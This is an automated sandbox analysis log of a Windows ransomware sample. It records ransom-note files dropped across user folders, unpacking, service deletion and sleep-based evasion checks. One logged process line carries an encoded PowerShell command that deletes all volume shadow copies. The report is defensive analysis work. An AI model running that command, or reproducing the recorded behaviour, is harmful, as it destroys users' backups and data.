        Source: HAjXCphNj5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.rans.evad.winEXE@5/208@0/0
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004048DE GetDriveTypeW,GetDiskFreeSpaceExW,0_2_004048DE
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040500F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_0040500F
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\program files\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\9f8ugt-readme.txtJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeMutant created: \Sessions\1\BaseNamedObjects\Global\B6CC837D-86BE-A32B-F1A9-2E0B99BA279D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icvcfwbc.myn.ps1Jump to behavior
        Source: HAjXCphNj5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: HAjXCphNj5.exeVirustotal: Detection: 48%
        Source: HAjXCphNj5.exeReversingLabs: Detection: 39%
        Source: unknownProcess created: C:\Users\user\Desktop\HAjXCphNj5.exe 'C:\Users\user\Desktop\HAjXCphNj5.exe'
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeDirectory created: c:\program files\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation:

        barindex
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeUnpacked PE file: 0.2.HAjXCphNj5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.i6x:W;.reloc:R;
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeUnpacked PE file: 0.2.HAjXCphNj5.exe.400000.0.unpack
        Source: HAjXCphNj5.exeStatic PE information: real checksum: 0x383da should be: 0x40753
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040E37B push 0000006Ah; retf 0_2_0040E454
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040E3E3 push 0000006Ah; retf 0_2_0040E454
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040E3E5 push 0000006Ah; retf 0_2_0040E454
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001CD835 push 0000006Ah; retf 0_2_001CD8A4
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001CD833 push 0000006Ah; retf 0_2_001CD8A4
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001CD7CC push 0000006Ah; retf 0_2_001CD8A4
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_00425BAC push eax; ret 0_2_00425BC6
        Source: initial sampleStatic PE information: section name: .text entropy: 7.59878330544
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: C:\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\program files\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\program files (x86)\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\recovery\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\jay jay hammer\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\desktop\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\documents\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\downloads\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\favorites\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\links\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\music\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\pictures\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\saved games\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\default\videos\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\3d objects\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\contacts\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\downloads\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\favorites\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\links\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\music\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\onedrive\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\pictures\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\recent\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\saved games\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\searches\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\videos\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\accountpictures\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\desktop\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\documents\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\downloads\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\libraries\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\music\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\pictures\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\public\videos\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\bjzfppwapt\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\ipkgelntqy\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\klizusiqen\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\nvwzapqsql\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\qcfwyskmha\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\sfpusafiol\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\sqrkhnbnyn\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\suavtzknfl\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\vamydfpund\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\wkxewiotxi\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\zggknsukop\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\desktop\ztgjilhxqb\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\20200719\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\bjzfppwapt\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\ipkgelntqy\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\klizusiqen\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\nvwzapqsql\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\qcfwyskmha\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\sfpusafiol\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\sqrkhnbnyn\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\suavtzknfl\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\vamydfpund\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\wkxewiotxi\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\zggknsukop\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\documents\ztgjilhxqb\9f8ugt-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeFile created: c:\users\user\favorites\links\9f8ugt-readme.txtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect sleep reduction / modificationsShow sources
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_0040559A0_2_0040559A
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_001C57EA0_2_001C57EA
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: 0_2_004054F0 rdtsc 0_2_004054F0
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_00403839
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_001C3A89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exeWindow / User API: threadDelayed 10000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2917Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2421Jump to behavior
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe TID: 4356Thread sleep count: 10000 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep count: 2917 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284Thread sleep count: 2421 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684Thread sleep time: -1844674407370954s >= -30000sJump to behavior
